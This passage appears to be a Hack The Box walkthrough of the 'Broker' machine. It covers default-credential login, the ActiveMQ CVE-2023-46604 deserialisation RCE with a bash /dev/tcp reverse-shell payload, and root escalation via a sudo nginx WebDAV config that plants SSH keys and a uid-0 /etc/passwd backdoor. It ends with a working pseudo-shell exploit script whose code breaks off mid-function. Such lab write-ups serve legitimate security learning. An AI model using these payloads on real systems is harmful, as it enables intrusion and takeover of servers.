    |   org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258) 
    |   org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85) 
    |   org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83) 
    |   org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233) 
    |   org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215) 
    |_   java.lang.Thread.run(Thread.java:750) 
    61614/tcp open  http    Jetty 9.4.39.v20210325 
    |_http-title: Site doesn't have a title. 
    | http-methods:  
    |_  Potentially risky methods: TRACE 
    |_http-server-header: Jetty(9.4.39.v20210325) 
    61616/tcp open  apachemq  ActiveMQ OpenWire transport 
    | fingerprint-strings:  
    |  NULL:  
    |   ActiveMQ 
    |   TcpNoDelayEnabled 
    |   SizePrefixDisabled 
    |   CacheSize 
    |   ProviderName  
    |   ActiveMQ 
    |   StackTraceEnabled 
    |   PlatformDetails  
    |   Java 
    |   CacheEnabled 
    |   TightEncodingEnabled 
    |   MaxFrameSize 
    |   MaxInactivityDuration 
    |   MaxInactivityDurationInitalDelay 
    |   ProviderVersion  
    |_   5.15.15 
    3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : 
    
    

    Let’s first take a look at the web page - based on nmap’s output, we’re expecting some kind of authentication, since our scan returned a 401.

    broker1

    As expected, we have HTTP basic auth in force. Of course, we could brute force this - but first, let’s try some low-tech hacking: how about some basic common credentials? admin/password does not work, but admin/admin does!

    Now that we’ve authenticated, we can confirm that we have an installation of Apache ActiveMQ:

    broker2

    Apache ActiveMQ is an open-source message broker built on the Java Message Service (JMS) standard, designed to facilitate communication between different systems, applications, and components. It serves as a middleware, enabling asynchronous messaging by providing a reliable way for components to exchange data through messages. In the context of, say, an e-commerce platform, Apache ActiveMQ can serve as a central messaging system between the Order Processing Service, Inventory Management Service, and Shipping Service. In a cloud context the same sort of task is performed by a service like AWS Simple Notification Service. Before we start to worry about the specific setup and what ActiveMQ could be passing messages for on this box, however, we have a specific version - let’s see if we have any possible vulnerabilities to exploit right here in ActiveMQ.
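    Incidentally, the wire protocols nmap flagged earlier are simple enough to speak by hand - a STOMP frame (port 61613) is just a command line, header lines, a blank line, and a NUL-terminated body. A minimal sketch of a frame builder (the /queue/orders destination is purely hypothetical, and no connection is made here):

    ```python
    def stomp_frame(command: str, headers: dict[str, str], body: str = "") -> str:
        """Serialise a STOMP frame: COMMAND, one header per line,
        a blank line, the body, then a NUL terminator."""
        head = "".join(f"{k}:{v}\n" for k, v in headers.items())
        return f"{command}\n{head}\n{body}\x00"

    # e.g. queueing a message for a hypothetical order-processing consumer
    frame = stomp_frame("SEND", {"destination": "/queue/orders"}, "order:12345")
    print(repr(frame))
    ```

    Sending a frame like this over a raw TCP socket to port 61613 is exactly what nmap’s mqtt/stomp probes do during service detection.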

    Firstly, let’s see if ActiveMQ was impacted by the recent Log4j vulnerability - CVE-2021-44228. A quick Google reveals some message threads on the ActiveMQ support boards confirming that “CVE-2021-44228 has no impact on any ActiveMQ broker because no ActiveMQ broker uses any version of Log4j2.” Despite this, some more digging suggests that ActiveMQ “Classic” does use Log4j for logging, but the latest versions (i.e. 5.15.15 and 5.16.3) use Log4j 1.2.17, which is not impacted by CVE-2021-44228. There’s enough woolly language here to attract my interest - sadly, it’s not uncommon to see vendors rush to claim their products are not vulnerable to “x” without really verifying this, or attempt to obfuscate possible issues with jargon - but since our version is 5.15.15, and that’s the exact version being held up as not vulnerable in the documentation, we’ll move on for now.

    After a bit more searching, I came across another possible vector - CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker, quote: “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” See what I mean about obfuscation?! This is a highly abstract way of saying that:

    A deserialization vulnerability exists in Apache ActiveMQ’s OpenWire protocol. This flaw can be exploited by an attacker to execute arbitrary code on the server where ActiveMQ is running.
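    To make that concrete, the packet the public POCs send is tiny: a short OpenWire header (the 0x1f command byte marks an ExceptionResponse), then two length-prefixed strings - the Spring class to instantiate and the URL of the attacker-hosted XML. A rough sketch, which reproduces the exact packet bytes you’ll see logged in the exploit output further down:

    ```python
    def build_openwire_packet(class_name: str, xml_url: str) -> str:
        """Build the malicious OpenWire frame as a hex string: fixed header,
        then two length-prefixed UTF-8 strings (the Spring class to
        instantiate and the URL of the attacker-hosted XML)."""
        def lp(s: str) -> str:
            # 2-byte big-endian length prefix followed by the raw bytes, hex-encoded
            return format(len(s), "04x") + s.encode().hex()
        header = "1f00000000000000000001"  # 0x1f command byte plus padding/flags
        body = header + "01" + lp(class_name) + "01" + lp(xml_url)
        return format(len(body) // 2, "08x") + body  # 4-byte total length prefix

    packet = build_openwire_packet(
        "org.springframework.context.support.ClassPathXmlApplicationContext",
        "http://10.10.14.48:8080/poc.xml",
    )
    print(packet)
    ```

    The broker deserialises this, dutifully instantiates ClassPathXmlApplicationContext, and fetches and executes our Spring XML - no authentication required.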

    We can quickly find a good POC exploit here https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ - the only issue with which is that we’ll need to generate an msfvenom binary to upload to the target - there’s also a python version which will execute a command instead, so let’s give this a whirl. Later on, I’ll write my own version which will give us a pseudoshell, but for now, let’s clone https://github.com/evkl1d/CVE-2023-46604 and give it a go!

    The exploit is well documented and simple enough to try - firstly, we’ll edit poc.xml to add our own address:

    <?xml version="1.0" encoding="UTF-8" ?> 
       <beans xmlns="http://www.springframework.org/schema/beans" 
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
         xsi:schemaLocation=" 
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> 
          <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> 
            <constructor-arg> 
            <list> 
              <value>bash</value> 
              <value>-c</value> 
              <value>bash -i &gt;&amp; /dev/tcp/10.10.14.48/8181 0&gt;&amp;1</value> 
            </list> 
            </constructor-arg> 
          </bean> 
       </beans>
    

    and run: python3 exploit.py -i broker.htb -p 61616 -u http://10.10.14.48:8080/poc.xml


       / \  ___| |_(_)_  _____|  \/  |/ _ \    |  _ \ / ___| ____| 
      / _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | |  |  _|  
      / ___ \ (__| |_| |\ V /  __/ |  | | |_| |_____|  _ <| |___| |___  
     /_/  \_\___|\__|_| \_/ \___|_|  |_|\__\_\   |_| \_\\____|_____| 
    
    
    [*] Target: broker.htb:61616 
    [*] XML URL: http://10.10.14.48:8080/poc.xml 
    
    [*] Sending packet: 000000721f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001f687474703a2f2f31302e31302e31342e34383a383038302f706f632e786d6c
    
    
    python3 -m http.server 8080 
    
    Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ... 
    
    10.129.65.79 - - [10/Nov/2023 14:08:57] "GET /poc.xml HTTP/1.1" 200 -
    
    
    └──╼ **$**nc -nvlp 8181 
    
    listening on [any] 8181 ... 
    
    connect to [10.10.14.48] from (UNKNOWN) [10.129.65.79] 46432 
    
    bash: cannot set terminal process group (875): Inappropriate ioctl for device 
    
    bash: no job control in this shell 
    
    activemq@broker:/opt/apache-activemq-5.15.15/bin$ whoami 
    
    whoami 
    
    activemq
    

    Our shell comes back, and we’re in as the activemq user!

    We’ll quickly grab user.txt from activemq’s home directory - now let’s enumerate.

    As always I’ll start by seeing if I have any sudo privileges:

    activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo -l  
    sudo -l  
    Matching Defaults entries for activemq on broker: 
       env_reset, mail_badpass, 
       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, 
       use_pty 
    
    User activemq may run the following commands on broker: 
       (ALL : ALL) NOPASSWD: /usr/sbin/nginx
    
    

    We have full control over nginx - this is certainly worth exploring - which version do I have?

    activemq@broker:/opt/apache-activemq-5.15.15/bin$ nginx -v 
    nginx version: nginx/1.18.0 (Ubuntu)
    

    Let’s see if we can find any vulnerabilities for this version… we find an article at Legal Hackers which seems relevant (and worth bearing in mind for the future): https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html - however, this won’t work on this occasion, as we’d need to be www-data.

    So we have no direct exploit - but what we can probably do is change the nginx configuration. Since we’re able to run nginx with sudo - which, remember, means we run it as root - we could actually mount the filesystem root / as a WebDAV directory. From there we can take a couple of approaches, such as dropping root ssh keys onto the box, or even just adding a user to /etc/passwd.

    Firstly, we’ll create a malicious configuration file:

    user root; 
    worker_processes 4; 
    pid /tmp/nginx.pid; 
    events { 
    worker_connections 768; 
    } 
    http { 
    server { 
    listen 7777; 
    root /; 
    autoindex on; 
    dav_methods PUT; 
    } 
    }
    

    Here, we define that the nginx worker processes will run as root, meaning that when we eventually upload a file, it will also be owned by root. The document root will be the root of the filesystem itself (/). Finally, dav_methods PUT enables the WebDAV HTTP extension’s PUT method, allowing clients to upload files via our listening port, 7777. Put together, this configuration exposes the whole filesystem and allows us to write any file we like, as root - that’s a really bad day for a system admin!

    Let’s download our file to the box, and then update the nginx configuration using sudo nginx -c

    activemq@broker:~$ wget http://10.10.14.48:8080/evil.conf 
    wget http://10.10.14.48:8080/evil.conf 
    --2023-11-10 14:26:33--  http://10.10.14.48:8080/evil.conf 
    Connecting to 10.10.14.48:8080... connected. 
    HTTP request sent, awaiting response... 200 OK 
    Length: 158 [application/octet-stream] 
    Saving to: ‘evil.conf’ 
    
       0K                            100% 33.4K=0.005s 
    
    2023-11-10 14:26:33 (33.4 KB/s) - ‘evil.conf’ saved [158/158] 
    activemq@broker:~$ cp evil.conf /tmp 
    activemq@broker:~$ sudo nginx -c /tmp/evil.conf 
    

    The configuration looks to have been applied - let’s run nmap from our attack box to verify:

    Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-10 14:29 GMT 
    Nmap scan report for broker.htb (10.129.65.79) 
    Host is up (0.020s latency). 
    
    PORT   STATE SERVICE 
    7777/tcp open  cbt 
    
    Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
    

    Excellent - the port is now open! Let’s first try to drop an ssh key on the box. I’ll generate a new ssh key using ssh-keygen on my system, then use curl to PUT the public key into the /root/.ssh folder on broker. I should then be able to log in via ssh.

    ──╼ **$**ssh-keygen                                                                                       
    Generating public/private rsa key pair. 
    Enter file in which to save the key (/home/duck/.ssh/id_rsa): root 
    Enter passphrase (empty for no passphrase):  
    Enter same passphrase again:  
    Your identification has been saved in root 
    Your public key has been saved in root.pub 
    The key fingerprint is: 
    SHA256:YCYo0XwzccK7448KdLqOIj9HIror0tE0ALvrYVjr0I8 
    The key's randomart image is: 
    +---[RSA 3072]----+ 
    |o+ .o..      | 
    | o+.=o      | 
    |o .o.++      | 
    | o  ++ .     | 
    |...+ o  S     | 
    |++=.=       | 
    |**o= .      | 
    |X+=oo.      | 
    |XBE+o..      | 
    +----[SHA256]-----+ 
    
    ─╼ **$**curl -X PUT broker.htb:7777/root/.ssh/authorized_keys -d "$(cat root.pub)"                                                      
    ──╼ **$**ssh root@broker.htb -i ./root 
    The authenticity of host 'broker.htb (10.129.65.79)' can't be established. 
    ECDSA key fingerprint is SHA256:/GPlBWttNcxd3ra0zTlmXrcsc1JM6jwKYH5Bo5qE5DM. 
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 
    Warning: Permanently added 'broker.htb,10.129.65.79' (ECDSA) to the list of known hosts. 
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64) 
     
     \* Documentation:  https://help.ubuntu.com 
     \* Management:   https://landscape.canonical.com 
     \* Support:     https://ubuntu.com/advantage 
     
      System information as of Fri Nov 10 02:35:47 PM UTC 2023 
     
      System load:      0.0 
      Usage of /:       70.4% of 4.63GB 
      Memory usage:      12% 
      Swap usage:       0% 
      Processes:       159 
      Users logged in:    0 
      IPv4 address for eth0: 10.129.65.79 
      IPv6 address for eth0: dead:beef::250:56ff:fe96:ec98 
     
     \* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s 
      just raised the bar for easy, resilient and secure K8s cluster deployment. 
     
      https://ubuntu.com/engage/secure-kubernetes-at-the-edge 
     
    Expanded Security Maintenance for Applications is not enabled. 
     
    0 updates can be applied immediately. 
     
    Enable ESM Apps to receive additional future security updates. 
    See https://ubuntu.com/esm or run: sudo pro status 
     
     
    root@broker:~#
    
    

    And we have root!

    Another option here would have been to edit /etc/passwd - strictly speaking, we can’t edit the file as the activemq user, however using the WebDAV folder we’ve set up we can overwrite the current file. Let’s grab the existing /etc/passwd:

    root:x:0:0:root:/root:/bin/bash 
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
    bin:x:2:2:bin:/bin:/usr/sbin/nologin 
    sys:x:3:3:sys:/dev:/usr/sbin/nologin 
    sync:x:4:65534:sync:/bin:/bin/sync 
    games:x:5:60:games:/usr/games:/usr/sbin/nologin 
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin 
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin 
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin 
    messagebus:x:103:104::/nonexistent:/usr/sbin/nologin 
    systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin 
    pollinate:x:105:1::/var/cache/pollinate:/bin/false 
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin 
    syslog:x:107:113::/home/syslog:/usr/sbin/nologin 
    uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin 
    tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin 
    tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false 
    landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin 
    fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin 
    usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin 
    lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false 
    activemq:x:1000:1000:,,,:/home/activemq:/bin/bash 
    _laurel:x:998:998::/var/log/laurel:/bin/false
    

    And we’ll edit /etc/passwd to add my own root user, then post it to the box:

    └──╼ **$**cat passwd 
    
    root:x:0:0:root:/root:/bin/bash  
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
    bin:x:2:2:bin:/bin:/usr/sbin/nologin  
    sys:x:3:3:sys:/dev:/usr/sbin/nologin  
    sync:x:4:65534:sync:/bin:/bin/sync  
    games:x:5:60:games:/usr/games:/usr/sbin/nologin  
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin  
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin  
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin  
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin  
    messagebus:x:103:104::/nonexistent:/usr/sbin/nologin  
    systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin  
    pollinate:x:105:1::/var/cache/pollinate:/bin/false  
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin  
    syslog:x:107:113::/home/syslog:/usr/sbin/nologin  
    uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin  
    tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin  
    tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false  
    landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin  
    fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin  
    usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin  
    lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false  
    activemq:x:1000:1000:,,,:/home/activemq:/bin/bash  
    _laurel:x:998:998::/var/log/laurel:/bin/false 
    duck:YIlaK190xVPVc:0:0:duck:/root:/bin/bash
    
    └──╼ **$**curl -X PUT broker.htb:7777/etc/passwd -d "$(cat passwd)"   
    

    With my known user and password added to /etc/passwd, I can now either switch user in my existing shell, or simply ssh in:

    ssh duck@broker.htb 
    duck@broker.htb's password:  
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64) 
     
     \* Documentation:  https://help.ubuntu.com 
     \* Management:   https://landscape.canonical.com 
     \* Support:     https://ubuntu.com/advantage 
     
      System information as of Fri Nov 10 02:41:40 PM UTC 2023 
     
      System load:      0.0 
      Usage of /:       70.4% of 4.63GB 
      Memory usage:      12% 
      Swap usage:       0% 
      Processes:       162 
      Users logged in:    0 
      IPv4 address for eth0: 10.129.65.79 
      IPv6 address for eth0: dead:beef::250:56ff:fe96:ec98 
     
     \* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s 
      just raised the bar for easy, resilient and secure K8s cluster deployment. 
     
      https://ubuntu.com/engage/secure-kubernetes-at-the-edge 
     
    Expanded Security Maintenance for Applications is not enabled. 
     
    0 updates can be applied immediately. 
     
    Enable ESM Apps to receive additional future security updates. 
    See https://ubuntu.com/esm or run: sudo pro status 
     
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings 
     
    
    
    Last login: Fri Nov 10 14:35:48 2023 from 10.10.14.48 
    root@broker:~# whoami 
    root
    

    How come this works? Aren’t Linux passwords now stored in /etc/shadow? They certainly are - and if you were to add a user with useradd, that’s exactly where the hash would go. The second field in /etc/passwd represents the user’s password, and you’ll see that most entries have an “x” - this simply means that the encrypted password is stored in /etc/shadow. However, a hash placed directly in /etc/passwd still takes precedence, so if I add the hash of a known password in this field instead, I have a valid user. Of course, in this scenario we could have edited /etc/shadow anyway - but this approach is worth knowing, in case something really dumb, like chmod 777 /etc/passwd, has taken place.
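    To make the field layout concrete, here’s the injected line pulled apart. (The YIlaK190xVPVc value is a classic 13-character DES crypt(3) hash - the first two characters are the salt - generated beforehand from a password of my choosing, e.g. with openssl passwd.)

    ```python
    # the injected /etc/passwd entry, split into its seven colon-separated fields
    entry = "duck:YIlaK190xVPVc:0:0:duck:/root:/bin/bash"
    name, pw_field, uid, gid, gecos, home, shell = entry.split(":")

    # "x" here would mean "defer to /etc/shadow"; anything else is treated
    # as a crypt(3) hash and checked directly - and uid/gid 0 makes the
    # account root in all but name
    print(name, pw_field != "x", uid == "0")
    ```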

    Of course, a line like this sticks out when you look at /etc/passwd - since this is HTB it really doesn’t matter, but for a real pentest, how about this?:

    root:x:0:0:root:/root:/bin/bash  
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
    bin:x:2:2:bin:/bin:/usr/sbin/nologin  
    sys:x:3:3:sys:/dev:/usr/sbin/nologin  
    sync:x:4:65534:sync:/bin:/bin/sync  
    games:x:5:60:games:/usr/games:/usr/sbin/nologin  
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin  
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin  
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin  
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin  
    messagebus:x:103:104::/nonexistent:/usr/sbin/nologin  
    systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin  
    pollinate:x:105:1::/var/cache/pollinate:/bin/false  
    msgsys:YIlaK190xVPVc:0:0:msgsys:/root:/bin/sh  
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin  
    syslog:x:107:113::/home/syslog:/usr/sbin/nologin  
    uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin  
    tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin  
    tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false  
    landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin  
    fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin  
    usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin  
    lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false  
    activemq:x:1000:1000:,,,:/home/activemq:/bin/bash  
    _laurel:x:998:998::/var/log/laurel:/bin/false 
    

    Some form of file integrity monitoring (or a blue teamer with a simple diff tool) will find this without much trouble - but spotting it by visual inspection alone is hard!
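    A quick sketch of what that diff-based check looks like - the baseline here is inlined and truncated for brevity, but in practice you’d compare against a stored known-good copy. Even with no baseline at all, simply flagging any uid-0 entry other than root would catch this:

    ```python
    import difflib

    # hypothetical known-good baseline vs. the file as found on the box (truncated)
    baseline = [
        "root:x:0:0:root:/root:/bin/bash",
        "pollinate:x:105:1::/var/cache/pollinate:/bin/false",
        "sshd:x:106:65534::/run/sshd:/usr/sbin/nologin",
    ]
    current = [
        "root:x:0:0:root:/root:/bin/bash",
        "pollinate:x:105:1::/var/cache/pollinate:/bin/false",
        "msgsys:YIlaK190xVPVc:0:0:msgsys:/root:/bin/sh",
        "sshd:x:106:65534::/run/sshd:/usr/sbin/nologin",
    ]
    diff = list(difflib.unified_diff(baseline, current, lineterm=""))
    for line in diff:
        print(line)

    # baseline-free heuristic: any uid-0 entry that isn't root is a red flag
    rogue = [l for l in current if l.split(":")[2] == "0" and not l.startswith("root:")]
    print(rogue)
    ```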

    └──╼ $ssh msgsys@broker.htb
    msgsys@broker.htb's password: 
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
    
     \* Documentation:  https://help.ubuntu.com
     \* Management:     https://landscape.canonical.com
     \* Support:        https://ubuntu.com/advantage
    
      System information as of Fri Nov 10 02:49:32 PM UTC 2023
    
      System load:           0.0
      Usage of /:            70.5% of 4.63GB
      Memory usage:          12%
      Swap usage:            0%
      Processes:             162
      Users logged in:       0
      IPv4 address for eth0: 10.129.65.79
      IPv6 address for eth0: dead:beef::250:56ff:fe96:ec98
    
     \* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
       just raised the bar for easy, resilient and secure K8s cluster deployment.
    
       https://ubuntu.com/engage/secure-kubernetes-at-the-edge
    
    Expanded Security Maintenance for Applications is not enabled.
    
    0 updates can be applied immediately.
    
    Enable ESM Apps to receive additional future security updates.
    See https://ubuntu.com/esm or run: sudo pro status
    
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    
    Last login: Fri Nov 10 14:48:00 2023 from 10.10.14.48
    root@broker:~# 
    

    Writing a better exploit

    Now, let’s take a moment to make the exploit from earlier a little more user-friendly - ideally, I like to be able to interact with a system in a minimal way, without uploading a binary and without having to spawn a shell if I don’t need to. This ended up getting a bit more complex than most blog readers will want to pick through, so at a high level: I use my own simple HTTP server to send and receive messages, with a function that automatically customises the required XML file for each command we’d like to send. By modifying the command executed on the target to POST its output back to us, cleaning up the response on our end, and sticking the whole thing in a loop, we get a pseudo-shell which functions pretty well! I’ve also included a quick and dirty connection check. Here’s the repo if you’d like to try it or learn more: https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

    import socket
    import argparse
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from xml.etree.ElementTree import Element, SubElement, tostring
    import threading
    from time import sleep
    
    
    def main(ip, port, srvip, srvport):
        url = "http://" + srvip + ":" + str(srvport) + "/poc.xml"
        
        print("#################################################################################")
        print("#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #")
        print("#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #")
        print("#################################################################################")
        print()
        
        print("[*] Target:", f"{ip}:{port}")
        print("[*] Serving XML at:", url)
        print("[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.")
        print("[*] Type 'exit' to quit")
        print()
        
        global connected
        connected = False
        if not connected:
            print("#################################################################################")
            print("# Not yet connected, send a command to test connection to host.                 #")
            print("# Prompt will change to Apache ActiveMQ$ once at least one response is received #")
            print("# Please note this is a one-off connection check, re-run the script if you      #")
            print("# want to re-check the connection.                                              #")
            print("#################################################################################")
            print()
        else:
            pass
        
        while True:
            prompt = "[Target not responding!]$ " if not connected else "Apache ActiveMQ$ "
            command = input(prompt)
            if command.lower() == 'exit':
                print("Exiting...")
                return
            
            if not command:
                print("Please enter a valid command.")
                continue
            else:
                execute(ip, port, srvip, srvport, command, url)
    
    
    def execute(ip, port, srvip, srvport, command, url):
        class_name = "org.springframework.context.support.ClassPathXmlApplicationContext"
        message = url
        header = "1f00000000000000000001"
        body = header + "01" + int2hex(len(class_name), 4) + string2hex(class_name) + "01" + int2hex(len(message), 4) + string2hex(message)
        payload = int2hex(len(body) // 2, 8) + body
        data = bytes.fromhex(payload)
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.connect((ip, port))
        conn.send(data)
        conn.close()
        
        command = command
        generate_xml(command, srvip, srvport)
        serve_xml_content(srvip, srvport)
        return
    
    
    def generate_xml(command, srvip, srvport): 
        root = Element('beans', attrib={
            'xmlns': 'http://www.springframework.org/schema/beans',
            'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',
            'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd'
        })
    
        bean = SubElement(root, 'bean', attrib={'id': 'pb', 'class': 'java.lang.ProcessBuilder', 'init-method': 'start'})
        constructor_arg = SubElement(bean, 'constructor-arg')
        l = SubElement(constructor_arg, 'list')
        full_command = command + """ | awk '{print $0";"}' | curl -X POST -d @- http://""" + srvip + ":" + str(srvport) + "/receive_data" #use ; as a separator for later
        values = ['bash', '-c', full_command]
        
        for value in values:
            SubElement(l, 'value').text = value
            
        xml_string = '<?xml version="1.0" encoding="UTF-8" ?>\n' + tostring(root).decode()
        with open('poc.xml', 'w') as file:
            file.write(xml_string)
        
        return xml_string
    
    
    run = True
    
    
    class CustomHTTPServer(HTTPServer):
        def handle_timeout(self):
            if not run:
                self.shutdown()
    
    
    class XMLServer(BaseHTTPRequestHandler):
        def log_message(self, format, *args):
            pass  # Override log_message to do nothing
        
        def do_GET(self):
            if self.path == '/poc.xml':
                with open('poc.xml', 'rb') as file:
                    self.send_response(200)
                    self.send_header('Content-type', 'text/xml')
                    self.end_headers()
                    self.wfile.write(file.read())  # serve poc.xml
            else:
                self.send_response(404)
                self.end_headers()
                self.wfile.write(b'404 - Not Found')
        
        def do_POST(self):
            content_length = int(self.headers['Content-Length'])
            post_data = self.rfile.read(content_length).decode()
            
            response_data = post_data.split(';') # use the ; to reconstruct line breaks
            
            for line in response_data:
                print(line)
            
            self.send_response(200)
            self.end_headers()
            global connected
            connected = True
            global run_server
            run_server = False
    
    
    def serve_xml_content(srvip, srvport):
        server_address = (srvip, srvport)
        httpd = HTTPServer(server_address, XMLServer)
        
        httpd.timeout = 1  # Set the server timeout
        
        global run_server
        run_server = True
        
        while run_server:
            httpd.handle_request()
        
        httpd.server_close()  # Close the server socket
        
        return
    
    
    def string2hex(s):
        return s.encode().hex()
    
    
    def int2hex(i, n):
        if n == 4:
